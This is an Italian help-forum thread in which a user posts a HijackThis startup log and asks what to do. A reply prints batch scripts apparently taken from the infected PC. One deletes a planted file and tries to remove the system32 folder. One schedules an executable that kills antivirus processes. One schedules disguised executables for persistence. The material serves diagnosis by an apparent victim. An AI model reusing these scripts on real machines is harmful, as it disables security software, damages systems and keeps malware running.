HKLM\..\Run: [iTunesHelper] "C:\Programmi\iTunes\iTunesHelper.exe" O4 - HKLM\..\Run: [TkBellExe] "C:\Programmi\File comuni\Real\Update_OB\realsched.exe" -osboot O4 - HKLM\..\Run: [etbrun] C:\windows\system32\eliteidr32.exe O4 - HKLM\..\Run: [WinPLOSION] "C:\Programmi\WinPLOSION\WinPlosion.exe" O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [MSMSGS] "C:\Programmi\Messenger\msmsgs.exe" /background O4 - HKCU\..\Run: [ASUS SmartDoctor] C:\Programmi\ASUS\SmartDoctor\\SmartDoctor.exe /start O4 - HKCU\..\Run: [Copernic Desktop Search] "C:\Programmi\Copernic Desktop Search\CopernicDesktopSearch.exe" /tray O4 - Global Startup: Logitech SetPoint.lnk = C:\Programmi\Logitech\SetPoint\KEM.exe O8 - Extra context menu item: Download with GetRight - C:\Programmi\GetRight\GRdownload.htm O8 - Extra context menu item: E&sporta in Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 O8 - Extra context menu item: Open with GetRight Browser - C:\Programmi\GetRight\GRbrowse.htm O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\j2re1.4.2_05\bin\npjpi142_05.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\j2re1.4.2_05\bin\npjpi142_05.dll O9 - Extra button: Ricerche - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL O9 - Extra button: (no name) - {B205A35E-1FC4-4CE3-818B-899DBBB3388C} - C:\Programmi\File comuni\Microsoft Shared\Encarta Search Bar\ENCSBAR.DLL O20 - Winlogon Notify: MCPClient - C:\Programmi\File comuni\Stardock\mcpstub.dll O20 - Winlogon Notify: WB - C:\PROGRA~1\Stardock\OBJECT~1\WINDOW~1\fastload.dll O23 - Service: Adobe LM Service - Unknown owner - C:\Programmi\File comuni\Adobe Systems Shared\Service\Adobelmsvc.exe O23 - Service: Adobe Active File Monitor (AdobeActiveFileMonitor) - Unknown owner - D:\Programmi\Adobe\Photoshop Elements 3.0\PhotoshopElementsFileAgent.exe O23 - Service: Alias Documentation Server (aliasdocserver) - Unknown owner - D:\Programmi\Alias\Maya6.0\docs\Wrapper.exe O23 - Service: ATK Keyboard Service (ATKKeyboardService) - ASUSTeK COMPUTER INC. - C:\WINDOWS\ATKKBService.exe O23 - Service: Autodesk Licensing Service - Unknown owner - C:\Programmi\File comuni\Autodesk Shared\Service\AdskScSrv.exe O23 - Service: CA ISafe (CAISafe) - Computer Associates International, Inc. - C:\WINDOWS\system32\ZoneLabs\isafe.exe O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmi\File comuni\InstallShield\Driver\1050\Intel 32\IDriverT.exe O23 - Service: Servizio iPod (iPodService) - Apple Computer, Inc. - C:\Programmi\iPod\bin\iPodService.exe O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe O23 - Service: Photoshop Elements Device Connect (PhotoshopElementsDeviceConnect) - Unknown owner - D:\Programmi\Adobe\Photoshop Elements 3.0\PhotoshopElementsDeviceConnect.exe O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Programmi\File comuni\Ulead Systems\DVD\ULCDRSvr.exe O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe Vi prego cosa posso fare... Ultima modifica di Bear72 : 31-05-2005 alle 12:46. |
|
|
|
30-05-2005, 19:17
|
#2 |
|
Member
Iscritto dal: Mar 2005
Messaggi: 142
|
Contenuto del file .bat
DelUS.bat
---------- :Repeat del "C:\WINDOWS\system32\username.exe" if exist "C:\WINDOWS\system32\username.exe" goto Repeat rmdir "C:\WINDOWS\system32" del "\DelUS.bat" winupd.bat ----------- @ECHO OFF SETLOCAL SET DEBUG=FALSE IF "%2"=="" goto Usage SET fAmt=%1 SET fCmd=%2 IF %fAmt% GTR 60 GOTO Usage IF %fAmt% LSS 1 GOTO Usage SET fOpt= IF %DEBUG%==TRUE ECHO fAmt %fAmt% fCmd %fCmd% fOpt %fOpt% START /W REGEDIT /E %TEMP%.\_TEMP.REG "HKEY_CURRENT_USER\Control Panel\International" FOR /F "tokens=1* delims==" %%A IN ('TYPE %TEMP%.\_TEMP.REG ^| FIND /I "iDate"') DO SET iDate=%%B FOR /F "tokens=1* delims==" %%A IN ('TYPE %TEMP%.\_TEMP.REG ^| FIND /I "sDate"') DO SET sDate=%%B FOR /F "tokens=1* delims==" %%A IN ('TYPE %TEMP%.\_TEMP.REG ^| FIND /I "iTime" ^| FIND /I /V "iTimePrefix"') DO SET iTime=%%B FOR /F "tokens=1* delims==" %%A IN ('TYPE %TEMP%.\_TEMP.REG ^| FIND /I "sTime" ^| FIND /I /V "sTimeFormat" ^| FIND /I /V "sTimePrefix"') DO SET sTime=%%B SET iDate=%iDate:"=% SET sDate=%sDate:"=% SET iTime=%iTime:"=% SET sTime=%sTime:"=% IF EXIST %TEMP%.\_TEMP.REG DEL %TEMP%.\_TEMP.REG IF %iDate%==0 FOR /F "TOKENS=1-4* DELIMS=%sDate% " %%A IN ('DATE/T') DO ( SET CYear=%%D SET CMonth=%%B SET CDay=%%C SET SortDate=%%D%%B%%C ) IF %iDate%==1 FOR /F "TOKENS=1-4* DELIMS=%sDate% " %%A IN ('DATE/T') DO ( SET CYear=%%D SET CMonth=%%C SET CDay=%%B SET SortDate=%%D%%C%%B ) IF %iDate%==2 FOR /F "TOKENS=1-4* DELIMS=%sDate% " %%A IN ('DATE/T') DO ( SET CYear=%%B SET CMonth=%%C SET CDay=%%D SET SortDate=%%B%%C%%D ) SET /A CMonth = 1%CMonth% - 100 SET /A CDay = 1%CDay% - 100 FOR /F "TOKENS=1,2* DELIMS=%sTime% " %%A IN ('TIME/T') DO ( SET CHour=%%A SET CMins=%%B SET SortTime=%%A%%B ) IF %iTime%==1 GOTO SkipAmPm SET AMPM=%CMins:~2,1% SET CMins=%CMins:~0,2% IF "%CHour:~0,1%"=="0" IF NOT "%CHour%"=="0" SET /A CHour = 1%CHour% - 100 IF %CHour% LSS 12 IF /I %AMPM%==P SET /A CHour = %CHour% + 12 IF %CHour% EQU 12 IF /I %AMPM%==A SET CHour=0 :SkipAmPm SET /A CMins = 1%CMins% - 100 IF "%CHour:~0,1%"=="0" IF NOT "%CHour%"=="0" SET /A CHour = 1%CHour% - 100 IF /I "%DEBUG%"=="TRUE" SET C | FIND /I /V "COM" IF /I "%DEBUG%"=="TRUE" SET SORT SET /A tMax = 59 - %fAmt% IF %CMins% GTR %tMax% (CALL :RollHour) ELSE (SET /A CMins = %CMins% + %fAmt%) IF %CMins% LSS 10 SET CMins = 0%CMins% IF %CHour% LSS 10 SET CHour = 0%CHour% :: Unload Live Protection Modules AT %CHour%:%CMins% C:\DOCUME~1\Fabio\IMPOST~1\Temp\upd.exe thguard.exe AT %CHour%:%CMins% C:\DOCUME~1\Fabio\IMPOST~1\Temp\upd.exe -t safensec.exe GOTO End :RollHour SET /A CMins = %CMins% - 60 + %fAmt% IF %CHour% EQU 23 SET CHour=-1 SET /A CHour = %CHour% + 1 GOTO:EOF :Usage GOTO End :End ENDLOCAL winupd2.bat ------------ @ECHO OFF SETLOCAL SET DEBUG=FALSE IF "%2"=="" goto Usage SET fAmt=%1 SET fCmd=%2 IF %fAmt% GTR 60 GOTO Usage IF %fAmt% LSS 1 GOTO Usage SET fOpt= IF %DEBUG%==TRUE ECHO fAmt %fAmt% fCmd %fCmd% fOpt %fOpt% START /W REGEDIT /E %TEMP%.\_TEMP.REG "HKEY_CURRENT_USER\Control Panel\International" FOR /F "tokens=1* delims==" %%A IN ('TYPE %TEMP%.\_TEMP.REG ^| FIND /I "iDate"') DO SET iDate=%%B FOR /F "tokens=1* delims==" %%A IN ('TYPE %TEMP%.\_TEMP.REG ^| FIND /I "sDate"') DO SET sDate=%%B FOR /F "tokens=1* delims==" %%A IN ('TYPE %TEMP%.\_TEMP.REG ^| FIND /I "iTime" ^| FIND /I /V "iTimePrefix"') DO SET iTime=%%B FOR /F "tokens=1* delims==" %%A IN ('TYPE %TEMP%.\_TEMP.REG ^| FIND /I "sTime" ^| FIND /I /V "sTimeFormat" ^| FIND /I /V "sTimePrefix"') DO SET sTime=%%B SET iDate=%iDate:"=% SET sDate=%sDate:"=% SET iTime=%iTime:"=% SET sTime=%sTime:"=% IF EXIST %TEMP%.\_TEMP.REG DEL %TEMP%.\_TEMP.REG IF %iDate%==0 FOR /F "TOKENS=1-4* DELIMS=%sDate% " %%A IN ('DATE/T') DO ( SET CYear=%%D SET CMonth=%%B SET CDay=%%C SET SortDate=%%D%%B%%C ) IF %iDate%==1 FOR /F "TOKENS=1-4* DELIMS=%sDate% " %%A IN ('DATE/T') DO ( SET CYear=%%D SET CMonth=%%C SET CDay=%%B SET SortDate=%%D%%C%%B ) IF %iDate%==2 FOR /F "TOKENS=1-4* DELIMS=%sDate% " %%A IN ('DATE/T') DO ( SET CYear=%%B SET CMonth=%%C SET CDay=%%D SET SortDate=%%B%%C%%D ) SET /A CMonth = 1%CMonth% - 100 SET /A CDay = 1%CDay% - 100 FOR /F "TOKENS=1,2* DELIMS=%sTime% " %%A IN ('TIME/T') DO ( SET CHour=%%A SET CMins=%%B SET SortTime=%%A%%B ) IF %iTime%==1 GOTO SkipAmPm SET AMPM=%CMins:~2,1% SET CMins=%CMins:~0,2% IF "%CHour:~0,1%"=="0" IF NOT "%CHour%"=="0" SET /A CHour = 1%CHour% - 100 IF %CHour% LSS 12 IF /I %AMPM%==P SET /A CHour = %CHour% + 12 IF %CHour% EQU 12 IF /I %AMPM%==A SET CHour=0 :SkipAmPm SET /A CMins = 1%CMins% - 100 IF "%CHour:~0,1%"=="0" IF NOT "%CHour%"=="0" SET /A CHour = 1%CHour% - 100 IF /I "%DEBUG%"=="TRUE" SET C | FIND /I /V "COM" IF /I "%DEBUG%"=="TRUE" SET SORT SET /A tMax = 59 - %fAmt% IF %CMins% GTR %tMax% (CALL :RollHour) ELSE (SET /A CMins = %CMins% + %fAmt%) IF %CMins% LSS 10 SET CMins = 0%CMins% IF %CHour% LSS 10 SET CHour = 0%CHour% :: Run Enhancement Products Scheduled Regurlarely AT %CHour%:%CMins% /Every:9 C:\WINDOWS\system32\username.exe AT %CHour%:%CMins% /Every:8 C:\WINDOWS\system32\shell32.exe AT %CHour%:%CMins% /Every:7 C:\WINDOWS\system32\wudupdate.exe AT %CHour%:%CMins% /Every:15 C:\WINDOWS\system32\sp2protect.exe GOTO End :RollHour SET /A CMins = %CMins% - 60 + %fAmt% IF %CHour% EQU 23 SET CHour=-1 SET /A CHour = %CHour% + 1 GOTO:EOF :Usage GOTO End :End ENDLOCAL |
|
|
|
|
|
| Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 16:30.
